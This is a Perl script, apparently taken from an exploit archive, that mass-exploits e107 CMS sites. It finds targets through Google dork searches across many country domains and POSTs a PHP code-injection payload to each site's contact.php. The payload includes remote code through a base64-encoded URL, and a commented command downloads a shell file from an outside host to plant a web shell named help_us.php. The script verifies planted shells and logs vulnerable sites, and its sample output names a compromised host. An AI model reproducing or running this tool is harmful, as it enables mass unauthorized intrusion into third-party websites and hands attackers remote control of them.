  1. #!/usr/bin/perl
  2. # Author: skpx
  3. # e107 mass scanner/shell uploader
  4. # http://www.exploit-db.com/exploits/12715
  5. #
  6. # Change it to whatever
  7. # passthru() command:
  8. # echo "tEStVulN";
  9. # uname -a;
  10. # php -r '$s=@file_get_contents("http://www.yucatekisimo.com/language/shell.txt");$f=@fopen("help_us.php","w");fputs($f,$s);fclose($f);';
  11. # echo "TesTvULn"
  12. #
  13. # If it prints the uname but not a shell match change the cmd to whatever (wget, curl, etc).
  14. #
  15. # http://www.omni-bot.de/e107/contact.php
  16. # [!] Site vulnerable...
  17. # Linux corwin 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 GNU/Linux
  18. # [!] PHP Shell: http://www.omni-bot.de/e107/help_us.php
  19. #
  20. use LWP::UserAgent;
  21. use URI::Escape;
  22.     my @tld = qw { ad ae am as at az ba be bf
  23.     bg bi bj bs ca cat cd cf cg ch ci cl cm cn
  24.     co.bw co.ck co.cr co.id co.il co.in co.jp
  25.     co.ke co.kr co.ls com co.ma com.af com.ag
  26.     com.ai com.ar com.au com.bd com.bh com.bn
  27.     com.bo com.br com.by com.bz com.co com.cu
  28.     com.do com.ec com.eg com.et com.fj com.gh
  29.     com.gi com.gt com.hk com.jm com.kh com.kw
  30.     com.lb com.ly com.mt com.mx com.my com.na
  31.     com.nf com.ng com.ni com.np com.om com.pa
  32.     com.pe com.ph com.pk com.pr com.py com.qa
  33.     com.sa com.sb com.sg com.sl com.sv com.tj
  34.     com.tr com.tw com.ua com.uy com.vc com.vn
  35.     co.mz co.nz co.th co.tz co.ug co.uk co.uz
  36.     co.ve co.vi co.za co.zm co.zw cz de dj dk
  37.     dm dz ee es fi fm fr ga ge gg gl gm gp gr
  38.     gy hn hr ht hu ie im is it it.ao je jo kg
  39.     ki kz la li lk lt lu lv md me mg mk ml mn
  40.     ms mu mv mw ne nl no nr nu pl pn ps pt ro
  41.     rs ru rw sc se sh si sk sm sn st td tg tk
  42.     tl tm to tt vg vu ws };
  43.     my $term = shift;
  44.     my $rand_tld = rand($#tld);
  45. my $dork  = "Powered by e107".$tld[$rand_tld];
  46. my $match = "AtlantiQ";
  47. my $cmd   = "include(base64_decode(\"aHR0cDovL2l0YWtjaXRvdWtyYWRuYS5pbi9Db2RlL3RiMDEudHh0\"));";
  48. my $log   = "e107-rce-sites.txt";
  49. google_search($dork);
  50. sub google_search {
  51.     # http://www.google.com/supported_domains
  52.     my @tld = qw { ad ae am as at az ba be bf
  53.     bg bi bj bs ca cat cd cf cg ch ci cl cm cn
  54.     co.bw co.ck co.cr co.id co.il co.in co.jp
  55.     co.ke co.kr co.ls com co.ma com.af com.ag
  56.     com.ai com.ar com.au com.bd com.bh com.bn
  57.     com.bo com.br com.by com.bz com.co com.cu
  58.     com.do com.ec com.eg com.et com.fj com.gh
  59.     com.gi com.gt com.hk com.jm com.kh com.kw
  60.     com.lb com.ly com.mt com.mx com.my com.na
  61.     com.nf com.ng com.ni com.np com.om com.pa
  62.     com.pe com.ph com.pk com.pr com.py com.qa
  63.     com.sa com.sb com.sg com.sl com.sv com.tj
  64.     com.tr com.tw com.ua com.uy com.vc com.vn
  65.     co.mz co.nz co.th co.tz co.ug co.uk co.uz
  66.     co.ve co.vi co.za co.zm co.zw cz de dj dk
  67.     dm dz ee es fi fm fr ga ge gg gl gm gp gr
  68.     gy hn hr ht hu ie im is it it.ao je jo kg
  69.     ki kz la li lk lt lu lv md me mg mk ml mn
  70.     ms mu mv mw ne nl no nr nu pl pn ps pt ro
  71.     rs ru rw sc se sh si sk sm sn st td tg tk
  72.     tl tm to tt vg vu ws };
  73.     my $term = shift;
  74.     my $rand_tld = rand($#tld);
  75.     my $inc = 10;
  76.     my $maxpages = 1024;
  77.     my @links;
  78.     for (my $pagenum = 0;$pagenum <= $maxpages;$pagenum += $inc) {
  79.         my $url = "http://www.google.".$tld[$rand_tld]."/search?q=".uri_escape($term)."&num=100&filter=0&start=".$pagenum;
  80.         my $query = send_query($url);
  81.         while ($query =~ m!href="(https?:\/\/[^>"]*)"!g) {
  82.             if ($1 !~ m!(google|googleusercontent)!) {
  83.                 my $rawlink = $1;
  84.                 my @process=process_links($rawlink);
  85.                 push(@links, @process);                
  86.             }
  87.         } sleep(2);
  88.     } return @links;
  89. }
  90. sub send_query {
  91.     my $url = shift;
  92.     my $ua = LWP::UserAgent->new or die;
  93.     $ua->agent('NULL');
  94.     $ua->timeout(10);
  95.     my $req = HTTP::Request->new(GET => $url);
  96.     my $res = $ua->request($req);
  97.     print $url . "\n";
  98.     return $res->content;
  99. }
  100. sub process_links {
  101.     my @links = shift;
  102.     my @xplurl;
  103.         foreach my $inc (@links) {
  104.         $inc =~ s!%3a!:!gi;
  105.         $inc =~ s!%3f!\/!gi;
  106.         if ($inc =~ m!e107_plugins!g) {
  107.             $inc =~ s!(e107_plugins)[^A-Za-z0-9].*$!!g;
  108.             push(@xplurl, $inc);
  109.         } else {
  110.             $inc =~ s!(https?:\/\/[^\/]+\/?)[^\s]+!$1!;
  111.             push(@xplurl,$inc);
  112.         }
  113.     } exploit_host(@xplurl);
  114. }
  115. sub exploit_host {
  116.     my @host = shift;
  117.     foreach my $inc (@host) {  
  118.         my $ua = LWP::UserAgent->new or die;
  119.         $ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
  120.         $ua->timeout(10);
  121.        
  122.         my $xpl = $inc . "/contact.php";
  123.         $xpl =~ s/\/\/contact.php/\/contact.php/g;
  124.         my $req = HTTP::Request->new(POST => $xpl);
  125.         $req->content_type('application/x-www-form-urlencoded');
  126.         $req->content("send-contactus=1&author_name=%5Bphp%5D" .$cmd. "%3Bdie%28%29%3B%5B%2Fphp%5D");
  127.        
  128.         my $res = $ua->request($req);
  129.         print $xpl . "\n";
  130.         my $cont = $res->content;
  131.         if ($cont =~ m!tEStVulN\n(.*)!g) {
  132.             my $uname = $1;
  133.             print "[!] Site vulnerable...\n";
  134.             print $uname . "\n";
  135.             # Write to logfile
  136.             open my $lh, '>>', $log or die $!;
  137.             print $lh "$xpl\n";
  138.             print $lh "$uname\n";
  139.             print $lh "-" x 35 . "\n";
  140.             close $lh or die $!;
  141.         } check_shell($xpl);
  142.     } sleep(1);
  143. }
  144. sub check_shell {
  145.     my $gotsh = shift;
  146.     $gotsh =~ s!contact\.php!help_us\.php!;
  147.     my $ua = LWP::UserAgent->new or die;
  148.     $ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
  149.     $ua->timeout(10);
  150.     my $surl = $gotsh;
  151.     my $req = HTTP::Request->new(GET => $surl);
  152.     my $res = $ua->request($req);
  153.     my $cont = $res->content;
  154.     if ($cont =~ m!$match!) {
  155.         print "[!] PHP Shell: " .$surl. "\n";
  156.         # Write to logfile
  157.         open my $lh, '>>', $log or die $!;
  158.         print $lh "$surl\n";
  159.         print $lh "-" x 35 . "\n";
  160.         close $lh or die $!;
  161.     }
  162. }